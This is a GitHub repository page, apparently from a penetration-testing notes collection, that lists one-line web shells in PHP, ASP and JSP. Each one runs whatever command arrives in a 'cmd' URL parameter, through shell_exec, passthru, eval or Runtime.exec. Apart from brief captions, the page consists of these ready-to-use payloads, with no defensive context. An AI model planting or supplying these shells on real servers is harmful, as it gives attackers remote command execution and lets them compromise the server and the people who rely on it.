Skip to content

Latest commit

 

History

History

Web Shells

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 

Web Shells

Table of Contents

PHP

Execute command (via shell)

Command inputted via "cmd" URL parameter.

<?php echo shell_exec($_GET['cmd']); ?>

Execute command

Command inputted via "cmd" URL parameter.

<?php echo passthru($_GET['cmd']); ?>

ASP

Execute command

Command inputted in "cmd" URL parameter.

<% eval request("cmd") %>

JSP

Execute command

Command inputted in "cmd" URL parameter.

<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>